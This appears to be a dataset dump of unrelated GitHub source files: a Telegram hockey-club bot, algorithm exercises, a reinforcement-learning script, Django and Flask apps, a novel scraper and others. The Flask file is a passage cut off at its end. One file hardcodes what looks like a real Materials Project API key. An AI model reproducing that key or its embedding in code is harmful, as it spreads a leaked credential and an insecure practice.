Рады приветствовать!\nВы всегда можете изменить свои данные с помощью команды /my_profile\nСовсем скоро я сообщу Вам место и время проведения Вашей первой тренировки в нашем клубе.''')\n await state.finish()\n\n#запись на занятие\n@dp.callback_query_handler(lambda call: call.data.startswith('accept_button'))\nasync def first_accept(call: types.CallbackQuery):\n today = datetime.today().date()\n training_id = call.data.split('_')[2]\n training_data_first = await dj.get_training_data_for_accept(today, training_id, call.from_user.id)\n # для тестов\n # test_date_time = \"2023-11-17 22:00:00\"\n # now = datetime.strptime(test_date_time, \"%Y-%m-%d %H:%M:%S\")\n now = datetime.now()\n if now >= training_data_first:\n await call.message.delete()\n await call.message.answer('Запись на занятие окончена. Обратитесь к тренеру.')\n return\n await call.message.delete()\n training_data_second = await dj.accept_training(today, training_id, call.from_user.id)\n training_date_time = training_data_second.get('date_time')\n training_place = training_data_second.get('place')\n training_address = training_data_second.get('address')\n \n url = training_data_second.get('route')\n message = f'''\nЗапись прошла успешно! ✅\n\nЖдём Вас {training_date_time}.\nАдрес: {training_place}, {training_address}\n\nПостроить маршрут'''\n await call.message.answer(message, disable_web_page_preview=True)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('declain_button'))\nasync def declain(call: types.CallbackQuery):\n today = datetime.today().date()\n training_id = call.data.split('_')[2]\n training_data_first = await dj.get_training_data_for_accept(today, training_id, call.from_user.id)\n\n now = datetime.now()\n if now >= training_data_first:\n await call.message.delete()\n await call.message.answer('Запись на занятие окончена. Ждём Вас снова!')\n return\n await call.message.delete()\n\n\n await dj.declain_training(today, training_id, call.from_user.id)\n await call.message.answer('❌ Тренировка отклонена. Ждём Вас в следующий раз!')\n\n\n#оценка тренировки\n@dp.callback_query_handler(lambda call: call.data and call.data.startswith('rate_button'))\nasync def get_rate(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n data = call.data.split('_')\n rate = data[2]\n training_id = data[3]\n await dj.set_rate(rate, training_id)\n await call.message.answer('Спасибо за оценку!')\n\n\n\n\n#запись на игру\n@dp.callback_query_handler(lambda call: call.data.startswith('accept_game_button'))\nasync def first_accept(call: types.CallbackQuery):\n await call.message.delete()\n game_id = call.data.split('_')[3]\n game_data = await dj.get_game_data_for_accept(game_id, call.from_user.id)\n\n now = datetime.now().replace(microsecond=0)\n game_datetime = game_data.get('datetime')\n if now >= game_datetime:\n await call.message.answer('Запись на игру окончена. Обратитесь к тренеру.')\n return\n \n is_accept = await dj.accept_game(game_id, call.from_user.id)\n if not is_accept:\n await call.message.answer('Пока игр нет')\n return\n \n url = game_data.get('route')\n address = game_data.get('address')\n place = game_data.get('place')\n game_datetime = game_datetime.strftime(\"%d.%m.%Y %H:%M\")\n message = f'''\nЗапись прошла успешно! 
✅\n\n{game_datetime} - ждём Вас на игру.\nАдрес: {place}, {address}\n\nПостроить маршрут'''\n await call.message.answer(message, disable_web_page_preview=True)\n\n\n@dp.callback_query_handler(lambda call: call.data.startswith('declain_game_button'))\nasync def declain(call: types.CallbackQuery):\n game_id = call.data.split('_')[3]\n is_accept = await dj.declain_game(game_id, call.from_user.id)\n if not is_accept:\n await call.message.answer('Пока игр нет')\n return\n await call.message.delete()\n await call.message.answer('❌ Игра отклонена. Ждём Вас в следующий раз!')","repo_name":"Shoichii/hockey_bot","sub_path":"bot/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":38460,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"38520359416","text":"from mp_api.client import MPRester\nimport pandas as pd\n\ndef DataRetrieval(chemsys):\n fields = ['formula_pretty','formation_energy_per_atom','energy_above_hull']\n with MPRester(\"NUNc2qkYfekFR1DkxzhKvBCAMVAgOLoF\") as mpr:\n docs = mpr.summary.search(chemsys=chemsys, fields=fields)\n df = pd.DataFrame(columns=fields)\n for row in range(len(docs)):\n df.at[row, 'formula_pretty'] = docs[row].formula_pretty\n df.at[row, 'formation_energy_per_atom'] = docs[row].formation_energy_per_atom\n df.at[row, 'energy_above_hull'] = docs[row].energy_above_hull\n row += 1\n return df\n","repo_name":"joshua142857/matsci","sub_path":"RHEAs_phase_prediction-main/testmaterialsproject.py","file_name":"testmaterialsproject.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"33534299318","text":"\n# Given a binary tree t and an integer s, determine whether there is a root to leaf path in t such that the sum of vertex values equals s.\n\n#\n# Binary trees are already defined with this interface:\n# class Tree(object):\n# def __init__(self, x):\n# self.value = x\n# self.left = None\n# self.right = None\ndef hasPathWithGivenSum(t, s):\n if not t: return False\n nodesToTraverse = [(t, 0)]\n while nodesToTraverse:\n currNode = nodesToTraverse.pop()\n node, currVal = currNode[0], currNode[1]\n currVal += node.value\n if currVal == s and not node.left and not node.right:\n return True\n if node.left: nodesToTraverse.append((node.left, currVal))\n if node.right: nodesToTraverse.append((node.right, currVal))\n return False\n","repo_name":"AnthonyTsui/AlgoPractice","sub_path":"CodeSignal/Binary Trees/hasPathWithGivenSum.py","file_name":"hasPathWithGivenSum.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"12161259314","text":"# Write a class to hold player information, e.g. 
what room they are in\n# currently.\n\nclass Player:\n def __init__(self, name, current_room):\n self.name = name\n self.current_room = current_room\n self.inventory = []\n self.gold = 0\n self.atk = 0\n self.hp = 10\n self.status = \"alive\"\n\n\n def move(self, direction):\n attribute = direction + '_to'\n\n if hasattr(self.current_room, attribute):\n self.current_room = getattr(self.current_room, attribute)\n else:\n print(\"you may not go in that direction!\\n\")\n\n def check_room_for_item(self, name):\n for i in self.current_room.contents:\n if i.name == name:\n return i\n return None\n\n def check_inventory_for_item(self, name):\n for i in self.inventory:\n if i.name == name:\n return i\n return None\n\n def print_info(self):\n output = f\"\\n[{self.name}]\\nStatus: {self.status}\\nHealth: {self.hp}\\nAttack: {self.atk}\\nGold: {self.gold}\\n\\n[Inventory]\\n\"\n\n if len(self.inventory) > 0:\n for i in self.inventory:\n output += f\"{i.name}: {i.description}\\n\"\n output += \"\\n\"\n else:\n output += \"Your Sack is Empty!\\n\"\n\n \n print(output)","repo_name":"decagondev/CS_41_long","sub_path":"adv/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"32706387261","text":"# !usr/bin/env python\n# -*- coding:utf-8 _*-\n# author:chenmeng\n# datetime:2020/5/7 21:00\n'''\nsolution1: 暴力的动态规划\nsolution2: 带有备忘录的动态规划,在备忘录中存储每一个计算过的总钱数需要的硬币数,那么在遍历的过程中就会省去重复计算。\nsolution3: 动态转移矩阵的动态规划。\nsolution4: dfs。将硬币从大到小排序,从最大的硬币开始,先用尽量大的硬币数量,使总金额减去硬币金额尽量小,然后在使用小金额进行相同的操作,\n同时记录在凑满总金额时用的最少的硬币个数。\n'''\nimport math\nclass Solution:\n # 暴力解法,超时\n def coinChange_1(self, coins, amount):\n\n def dp(n):\n if n == 0: return 0\n if n < 0: return -1\n res = float('inf')\n for coin in coins:\n sub = dp(n - coin)\n if sub == -1: continue\n res = min(res, 1 + sub)\n return res if res != float('inf') else -1\n\n return dp(amount)\n\n def coinChange_2(self, coins, amount):\n memo = {}\n\n def dp(n):\n if n in memo: return memo[n]\n if n == 0: return 0\n if n < 0: return -1\n res = float('inf')\n for coin in coins:\n sub = dp(n - coin)\n if sub == -1: continue\n res = min(res, sub + 1)\n memo[n] = res if res != float('inf') else -1\n return memo[n]\n\n return dp(amount)\n\n def coinChange_3(self, coins, amount):\n # 因为对于amount,最大的硬币数就是amount个了,所以这里设置初始值为amount+1,相当于一个没有意义的数。\n dp = [amount + 1 for _ in range(amount + 1)]\n dp[0] = 0\n for i in range(1, len(dp)):\n for coin in coins:\n if i - coin < 0: continue\n dp[i] = min(dp[i], dp[i - coin] + 1)\n return -1 if dp[amount] == amount + 1 else dp[amount]\n\n def coinChange_4(self, coins, amount):\n n = len(coins)\n # 使硬币金额倒叙,从最大的开始\n coins = sorted(coins, reverse=True)\n res = amount + 1\n\n def dfs(index, target, count):\n nonlocal res\n this_coin = coins[index]\n # 如果当前的硬币来凑剩余的target的数量加上之前累积的硬币数count大于等于之前的解res,那么舍去这种方法\n # math.ceil()是向上取整,例如10/3=4\n if count + math.ceil(target / this_coin) >= res:\n return\n # 如果剩余的target能够整除当前的硬币金额,那么记录下当前解\n if target % this_coin == 0:\n res = count + target // this_coin\n # 如果当前的index已经是最后一个了,那么后边就不需要再去计算了,说明所有的硬币都凑过了,但是没凑全\n if index == n - 1:\n return\n # 这里就是一个dfs搜索,先用最大的硬币来凑,然后逐次递减硬币的金额,如果当前硬币金额大于target,那么target//this_coin=0,也就是使用0个当前硬币\n for i in range(target // this_coin, -1, -1):\n dfs(index + 1, target - i * this_coin, count + i)\n\n dfs(0, amount, 0)\n return -1 if res == amount + 1 else res\n\n\n\nif __name__ == '__main__':\n solution = Solution()\n coins = [1, 2, 5]\n amount = 11\n 
print(solution.coinChange_4(coins, amount))\n","repo_name":"KevinChen1994/leetcode-algorithm","sub_path":"top100/322.py","file_name":"322.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"35683447919","text":"from elasticsearch_dsl import analyzer, token_filter\n\nfrom course_discovery.settings.process_synonyms import get_synonym_lines_from_file\n\n__all__ = ('html_strip', 'synonym_text', 'edge_ngram_completion', 'case_insensitive_keyword',)\n\nhtml_strip = analyzer(\n 'html_strip', tokenizer='standard', filter=['lowercase', 'stop', 'snowball'], char_filter=['html_strip']\n)\n\nsynonym_tokenfilter = token_filter('synonym_tokenfilter', 'synonym', synonyms=get_synonym_lines_from_file())\n\nsynonym_text = analyzer(\n 'synonym_text',\n tokenizer='standard',\n filter=[\n # The ORDER is important here.\n 'lowercase',\n synonym_tokenfilter,\n # Note! 'snowball' comes after 'synonym_tokenfilter'\n 'snowball',\n ],\n char_filter=['html_strip'],\n)\n\nedge_ngram_completion_filter = token_filter(\n 'edge_ngram_completion_filter',\n type=\"edge_ngram\",\n min_gram=2,\n max_gram=22\n)\n\n\nedge_ngram_completion = analyzer(\n \"edge_ngram_completion\",\n tokenizer=\"standard\",\n filter=[\"lowercase\", edge_ngram_completion_filter]\n)\n\ncase_insensitive_keyword = analyzer(\n \"case_insensitive_keyword\",\n tokenizer=\"keyword\",\n filter=[\"lowercase\"]\n)\n","repo_name":"openedx/course-discovery","sub_path":"course_discovery/apps/course_metadata/search_indexes/documents/analyzers.py","file_name":"analyzers.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"30"} +{"seq_id":"42614246212","text":"#!/usr/bin/python3\nimport sys\nif (__name__ == \"__main__\"):\n argv = sys.argv\n i = 1\n if (len(argv) == 1):\n print(\"0 arguments.\")\n elif (len(argv) == 2):\n print(\"1 argument:\\n1: {:s}\".format(argv[1]))\n else:\n print(\"{:d} arguments:\".format(len(argv) - 1))\n while (i < len(argv)):\n print(\"{:d}: {:s}\".format((i), argv[i]))\n i += 1\n","repo_name":"sagudecod97/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"33923103763","text":"from ppo.runner import Runner\nfrom ppo.model import Model\nfrom ppo.policies import PolicyFullyConnected\nfrom common.env_wrapper import EnvWrapper\nfrom pysc2.env.sc2_env import SC2Env\nfrom pysc2.lib.features import Dimensions\nfrom pysc2.lib.features import AgentInterfaceFormat\nfrom common.utilities import global_seed\nimport argparse\nimport numpy as np\nimport sys\nimport absl.flags\nabsl.flags.FLAGS(sys.argv)\n\n\ndef run():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--timesteps', default=int(1e6))\n parser.add_argument('--num_steps', default=128)\n parser.add_argument('--entropy_coefficient', default=0.01)\n parser.add_argument('--learning_rate', default=2e-4)\n parser.add_argument('--gae_gamma', default=0.99)\n parser.add_argument('--gae_lambda', default=0.95)\n parser.add_argument('--num_batches', default=4)\n parser.add_argument('--num_training_epochs', default=4)\n parser.add_argument('--clip_range', default=0.2)\n parser.add_argument('--summary_frequency', default=20000)\n 
parser.add_argument('--performance_num_episodes', default=10)\n parser.add_argument('--summary_log_dir', default=\"ppo_fc\")\n args = parser.parse_args()\n\n dimensions = Dimensions(screen=(32, 32), minimap=(1, 1))\n interface_format = AgentInterfaceFormat(\n feature_dimensions=dimensions,\n use_feature_units=True,\n )\n\n global_seed(0)\n batch_size = args.num_steps // args.num_batches\n env = SC2Env(map_name=\"MoveToBeacon\",\n agent_interface_format=interface_format,\n step_mul=8,\n random_seed=1\n )\n\n env = EnvWrapper(env)\n\n model = Model(\n policy=PolicyFullyConnected,\n observation_space=env.observation_space,\n action_space=env.action_space,\n learning_rate=args.learning_rate,\n spatial_resolution=(5, 5),\n clip_range=args.clip_range,\n entropy_coefficient=args.entropy_coefficient\n )\n\n runner = Runner(env=env,\n model=model,\n num_steps=args.num_steps,\n advantage_estimator_gamma=args.gae_gamma,\n advantage_estimator_lambda=args.gae_lambda,\n summary_frequency=args.summary_frequency,\n performance_num_episodes=args.performance_num_episodes,\n summary_log_dir=args.summary_log_dir)\n\n for _ in range(0, (args.timesteps // args.num_steps) + 1):\n assert args.num_steps % args.num_batches == 0\n step = runner.run()\n observations = np.asarray(step[0])\n actions = np.asarray(step[1])\n available_actions = np.asarray(step[2])\n actions_spatial = np.asarray(step[3])\n actions_spatial_mask = np.asarray(step[4])\n advantage_estimations = np.asarray(step[5])\n values = np.asarray(step[6])\n probs = np.asarray(step[7])\n probs_spatial = np.asarray(step[8])\n indexes = np.arange(args.num_steps)\n\n for _ in range(args.num_training_epochs):\n np.random.shuffle(indexes)\n\n for i in range(0, args.num_steps, batch_size):\n shuffled_indexes = indexes[i:i + batch_size]\n model.train(observations=\n [observations[0][shuffled_indexes],\n observations[1][shuffled_indexes],\n observations[2][shuffled_indexes]\n ],\n actions=actions[shuffled_indexes],\n available_actions_mask=available_actions[shuffled_indexes],\n actions_spatial=actions_spatial[shuffled_indexes],\n actions_spatial_mask=actions_spatial_mask[shuffled_indexes],\n advantages=advantage_estimations[shuffled_indexes],\n values=values[shuffled_indexes],\n probs=probs[shuffled_indexes],\n probs_spatial=probs_spatial[shuffled_indexes]\n )\n\n\ndef main():\n run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"saschaschramm/MoveToBeacon","sub_path":"ppo/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"36139647707","text":"from copy import deepcopy\nfrom django.contrib import admin\nfrom mezzanine.pages.admin import PageAdmin\nfrom models import HomePage, Services, About\n\n#ABOUT ADMIN\nabout_extra_fieldsets = ((None, {\"fields\": (\"headertext\", \"bodytext\",)}),)\nclass AboutAdmin(PageAdmin):\n fieldsets = deepcopy(PageAdmin.fieldsets) + about_extra_fieldsets\n\n#HOMEPAGE ADMIN\nhomepage_extra_fieldsets = ((None, {\"fields\": (\"headerone\",\"headertwo\",\n \"coloneheader\", \"coltwoheader\",\n \"colthreeheader\",\"colonetext\",\n \"coltwotext\", \"colthreetext\",)}),)\nclass HomePageAdmin(PageAdmin):\n fieldsets = deepcopy(PageAdmin.fieldsets) + homepage_extra_fieldsets\n\n#SERVICES ADMIN\nservices_extra_fieldsets = ((None, {\"fields\": (\"headertext\",\"colonetext\", \"coltwotext\",)}),)\nclass ServicesAdmin(PageAdmin):\n fieldsets = deepcopy(PageAdmin.fieldsets) + 
services_extra_fieldsets\n\nadmin.site.register(About, AboutAdmin)\nadmin.site.register(HomePage, HomePageAdmin)\nadmin.site.register(Services, ServicesAdmin)\n\n ","repo_name":"mmansour/ijc","sub_path":"ijctheme/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"37131060661","text":"#!/usr/bin/python3\n# get_enumorset_info.py: wrapper to demonstrate get_enumorset_info()\n# utility routine.\n\n# Usage: get_enumorset_info.py db_name tbl_name col_name\n\nimport sys\nimport mysql.connector\nimport cookbook\nfrom cookbook_utils import *\n\n\nif len(sys.argv) != 4:\n print(\"Usage: get_enumorset_info.py db_name tbl_name col_name\")\n sys.exit(1)\ndb_name = sys.argv[1]\ntbl_name = sys.argv[2]\ncol_name = sys.argv[3]\n\ntry:\n conn = cookbook.connect()\nexcept mysql.connector.Error as e:\n print(\"Error code: %s\" % e.errno)\n print(\"Error message: %s\" % e.msg)\n sys.exit(1)\n\n#@ _USE_FUNCTION_\ninfo = get_enumorset_info(conn, db_name, tbl_name, col_name)\nprint(\"Information for \" + db_name + \".\" + tbl_name + \".\" + col_name + \":\")\nif info is None:\n print(\"No information available (not an ENUM or SET column?)\")\nelse:\n print(\"Name: %s\" % info[\"name\"])\n print(\"Type: %s\" % info[\"type\"])\n print(\"Legal values: %s\" % \",\".join(info[\"values\"]))\n if info[\"nullable\"]:\n print(\"Nullable: yes\")\n else:\n print(\"Nullable: no\")\n if info[\"default\"] is None:\n print(\"Default value: NULL\")\n else:\n print(\"Default value: %s\" % info[\"default\"])\n#@ _USE_FUNCTION_\n\nconn.close()\n","repo_name":"shangzongyu/source-code","sub_path":"src/mysqlcookbook/recipes/metadata/get_enumorset_info.py","file_name":"get_enumorset_info.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"30"} +{"seq_id":"19187700636","text":"import numbers\r\nimport requests\r\nfrom lxml import html\r\nimport re\r\nimport reqtest as req\r\njudul = input(\"cari: \")\r\nwebLnk = ('https://engnovel.com/?s='+judul)\r\n\r\n# path list:\r\nLinkPath = '//*[@id=\"truyen-slide\"]/div[1]/div/div[1]/div/div/div/div[1]/div[2]/a/@href'\r\nTitlePath = '//*[@id=\"truyen\"]/div[1]/div/div[1]/div/div[3]/h3'\r\nRatePath = '/html/body/div[1]/div[3]/div[1]/div/div[1]/div/div[3]/div[1]'\r\nDescPath = '//*[@id=\"truyen\"]/div[1]/div/div[1]/div/div[3]/div[2]'\r\nLastetChap = '//*[@id=\"new-chapter\"]/div[2]/div/ul/li[1]/a/@href'\r\n\r\ndef chapterGetter(chapter):\r\n fn = re.findall(\"[0-9]\",str(chapter))\r\n fr = list(map(int, fn))\r\n s = [str(integer) for integer in fr]\r\n a_string = \"\".join(s)\r\n res = int(a_string)\r\n return res\r\ndef linkGetter():\r\n resp = requests.get(webLnk)\r\n byte_data = resp.content\r\n source_code = html.fromstring(byte_data)\r\n tree = source_code.xpath(LinkPath)\r\n tr = source_code.xpath('//*[@id=\"truyen-slide\"]/div[1]/div/div[1]/div/div/div/div/div[2]/div[4]')\r\n linkan = tree[0]\r\n chp = tr[0].text_content()\r\n print(linkan)\r\n return linkan\r\n\r\ndef listedChapter(lasted):\r\n resp = requests.get(webLnk)\r\n byte_data = resp.content\r\n source_code = html.fromstring(byte_data)\r\n tr = source_code.xpath('//*[@id=\"truyen-slide\"]/div[1]/div/div[1]/div/div/div/div/div[2]/div[4]')\r\n chp = tr[0].text_content()\r\n chapamount = chapterGetter(chp)\r\n for x in range(1, chapamount):\r\n data = req.getLnk(lasted, x)\r\n print(data)\r\ndef descGetter():\r\n url 
= linkGetter()\r\n rsp = requests.get(url)\r\n bt = rsp.content\r\n sc = html.fromstring(bt)\r\n tr = sc.xpath(TitlePath)\r\n new = sc.xpath(DescPath)\r\n rw = sc.xpath(RatePath)\r\n lastcp = sc.xpath(LastetChap)\r\n Lasted = lastcp[0]\r\n lx = Lasted.split(\"chapter-\")[1:]\r\n rating = rw[0].text_content()\r\n Deskirpsi = new[0].text_content()\r\n titles = tr[0].text_content()\r\n print(\"Title: \",titles+\"\\nrating: \"+rating+\"\\nDesc: \"+Deskirpsi)\r\n listedChapter(Lasted)\r\ndescGetter()","repo_name":"zarlicho/engnovel-Scrape","sub_path":"engnovel.py","file_name":"engnovel.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"74564131564","text":"from flask import render_template, request, redirect, url_for, flash, session\nfrom sqlalchemy import func\nfrom app import app, db\nfrom src.models import Cosecha, TipoRecolector, Recolector, Compra, Evento, Banco\nfrom src.decoradores import login_required\nfrom src.verificadores import verificar_cosecha_exists\nimport datetime\n\n@app.route(\"/cosecha//\", methods=['GET', 'POST'])\n@login_required\ndef compras(cosecha_id, tipo):\n \"\"\" Generar Compras / Listar Compras \"\"\"\n\n error=None\n compras = Compra.query.filter_by(cosecha_id=cosecha_id).all()\n recolectores = Recolector.query.all()\n total_cantidad = sum(compra.cantidad_total for compra in compras)\n total_monto = sum(compra.monto for compra in compras)\n\n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, tipo, cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n \n if request.method == \"POST\":\n # Verifica que el recolector esté en la base de datos\n cedula = request.form['cedula']\n recolector = Recolector.query.filter_by(ci=cedula).first()\n if recolector is None:\n tipo_recolector = TipoRecolector.query.all()\n error = \"El recolector no se encuentra registrado. 
Registre el recolector antes de realizar la compra\"\n return render_template(\"recolector.html\", error=error, tipo_prod=tipo_recolector, recolector=recolectores) \n\n try:\n fecha = datetime.datetime.now()\n clase_cacao = request.form['clase_cacao']\n precio = request.form.get('precio', type=float)\n cantidad = request.form.get('cantidad', type=float)\n humedad = request.form.get('humedad', type=float)\n merma_porcentaje = request.form.get('merma_porcentaje', type=float)\n monto = request.form.get('monto', type=float)\n observacion = request.form['observacion']\n almendra = True if request.form.get(\"almendra\") == \"on\" else False\n\n # Calcula atributos derivables\n if almendra:\n merma_porcentaje *= 2\n merma_kg = merma_porcentaje / 100 * cantidad\n cantidad_total = cantidad - merma_kg\n\n compra = Compra(cosechas=cosecha, fecha=fecha, recolectores=recolector, \n clase_cacao=clase_cacao, precio=precio, cantidad=cantidad, humedad=humedad, \n merma_porcentaje=merma_porcentaje, merma_kg=merma_kg, cantidad_total=cantidad_total, monto=monto, \n observacion=observacion, almendra=almendra)\n\n evento_user = session['usuario']\n operacion = 'Agregar Compra'\n modulo = 'Compra'\n evento_desc = str(compra)\n evento = Evento(usuario=evento_user, evento=operacion, modulo=modulo, fecha=fecha, descripcion=evento_desc)\n\n nro_compra = Compra.query.count()\n monto = compra.monto\n concepto = 'Débito por compra Nro. {}'.format(nro_compra)\n transaccion = Banco(fecha=fecha, concepto=concepto, monto=monto, compra_id=nro_compra, credito=False)\n\n db.session.add(evento)\n db.session.add(compra)\n db.session.add(transaccion)\n db.session.commit()\n\n flash('Se ha registrado exitosamente.')\n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=tipo)) \n except:\n error = \"Hubo un error agregando la compra.\"\n\n hide = True if tipo == \"listar\" else False\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, recolectores=recolectores,\n total_cantidad=total_cantidad, total_monto=total_monto, hide=hide)\n\n@app.route(\"/cosecha///search\", methods=['GET', 'POST'])\n@login_required\ndef search_compras(cosecha_id, tipo):\n \"\"\" Search Bar de Generar Compras / Listar Compras \"\"\"\n\n error = None\n compras = []\n \n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, tipo, cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n \n if request.method == \"POST\":\n compras_desde, compras_hasta = Compra.query.filter_by(cosecha_id=cosecha_id), Compra.query.filter_by(cosecha_id=cosecha_id)\n fecha_inicio, fecha_fin = request.form['Desde'], request.form['Hasta']\n if (fecha_inicio != ''):\n compras_desde = Compra.query.filter(Compra.fecha >= fecha_inicio, Compra.cosecha_id==cosecha_id)\n if (fecha_fin != ''):\n compras_hasta = Compra.query.filter(Compra.fecha <= fecha_fin, Compra.cosecha_id==cosecha_id)\n \n # Intersecta las dos tablas de compras_desde y compras_hasta\n compras_fecha = compras_desde.intersect(compras_hasta)\n \n palabra = request.form['search_compra']\n clase_cacao = Compra.query.filter(Compra.clase_cacao.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n precio = Compra.query.filter(Compra.precio.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n cantidad = Compra.query.filter(Compra.cantidad.like('%' + palabra + '%'), 
Compra.cosecha_id==cosecha_id)\n humedad = Compra.query.filter(Compra.humedad.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n merma_porcentaje = Compra.query.filter(Compra.merma_porcentaje.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n merma_kg = Compra.query.filter(Compra.merma_kg.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n cantidad_total = Compra.query.filter(Compra.cantidad_total.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n monto = Compra.query.filter(Compra.monto.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n observacion = Compra.query.filter(Compra.observacion.like('%' + palabra + '%'), Compra.cosecha_id==cosecha_id)\n compras = clase_cacao.union(precio, cantidad, humedad, merma_porcentaje, merma_kg, cantidad_total, monto, observacion)\n \n tmp = Recolector.query.filter(Recolector.ci.like('%' + palabra + '%')).first()\n if tmp is not None:\n prod = Compra.query.filter(Compra.recolector_id.like('%' + str(tmp.id) + '%'), Compra.cosecha_id==cosecha_id)\n compras = compras.union(prod)\n\n tmp = TipoRecolector.query.filter(TipoRecolector.descripcion.like('%' + palabra + '%')).first()\n if tmp is not None:\n cmp = Compra.query.filter(Compra.recolector_id.like('%' + str(tmp.id) + '%'), Compra.cosecha_id==cosecha_id)\n compras = compras.union(cmp) \n\n compras = compras_fecha.intersect(compras)\n total_cantidad = sum(compra.cantidad_total for compra in compras)\n total_monto = sum(compra.monto for compra in compras)\n hide = True if tipo == \"listar\" else False\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, \n total_cantidad=total_cantidad, total_monto=total_monto, hide=hide) \n\n@app.route('/cosecha//compras//delete', methods=['GET', 'POST'])\n@login_required\ndef delete_compra(cosecha_id, compra_id):\n \"\"\" Borrar datos de compra \"\"\"\n\n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, \"compras\", cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n\n compra_to_delete = Compra.query.get_or_404(compra_id)\n if request.method == \"POST\":\n try:\n fecha = datetime.datetime.now()\n evento_user = session['usuario']\n operacion = 'Eliminar Compra'\n modulo = 'Compra'\n evento_desc = str(compra_to_delete)\n evento = Evento(usuario=evento_user, evento=operacion, modulo=modulo, fecha=fecha, descripcion=evento_desc)\n\n #desligar la compra de la cosecha: cambiar compra id a Null\n banco_id = Banco.query.filter_by(compra_id=compra_id).first().id\n transaccion = Banco.query.filter_by(id = banco_id).first()\n transaccion.compra_id = None\n\n # Crear un credito por reverso de fondos\n monto = compra_to_delete.monto\n concepto = 'Reverso de compra'\n reverso = Banco(fecha=fecha, concepto=concepto, monto=monto, compra_id=compra_id, credito=True)\n\n db.session.add(reverso)\n db.session.add(evento)\n db.session.delete(compra_to_delete)\n db.session.commit()\n \n flash('Se ha eliminado exitosamente.')\n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=\"compras\"))\n except:\n error = \"Hubo un error borrando la cosecha.\"\n \n return redirect(url_for('compras', cosecha_id=cosecha_id, tipo=\"compras\"))\n\n@app.route('/cosecha//compras//update', methods=['GET', 'POST'])\n@login_required\ndef update_compra(cosecha_id, compra_id):\n \"\"\" Editar datos de compra 
\"\"\"\n \n error=None\n tipo_prod = TipoRecolector.query.all()\n compras = Compra.query.filter_by(cosecha_id=cosecha_id).all()\n recolectores = Recolector.query.all()\n\n # Verificar que la cosecha exista en la base de datos o esté habilitada\n cosecha = Cosecha.query.filter_by(id=cosecha_id).first()\n error = verificar_cosecha_exists(cosecha_id, \"compras\", cosecha)\n if error is not None:\n cosechas = Cosecha.query.all()\n return render_template('cosecha.html', error=error, cosechas=cosechas) \n\n # Verificar que la compra exista en la base de datos\n compra = Compra.query.filter_by(id=compra_id).first()\n if compra is None:\n error = \"La compra no se encuentra registrada.\"\n return render_template('compras.html', error=error, cosecha=cosecha, compras=compras, tipo_prod=tipo_prod, recolectores=recolectores)\n\n if request.method == \"POST\":\n try:\n evento_desc = str(compra)\n compra.clase_cacao = request.form['clase_cacao']\n compra.precio = request.form.get('precio', type=float)\n compra.cantidad = request.form.get('cantidad', type=float)\n compra.humedad = request.form.get('humedad', type=float)\n compra.merma_porcentaje = request.form.get('merma_porcentaje', type=float)\n compra.monto = request.form.get('monto', type=float)\n compra.observacion = request.form['observacion']\n almendra = True if request.form.get(\"almendra\") == \"on\" else False\n compra.almendra = almendra\n\n # Calcula atributos derivables\n if almendra:\n compra.merma_porcentaje = 2 * request.form.get('merma_porcentaje', type=float)\n compra.merma_kg = compra.cantidad * 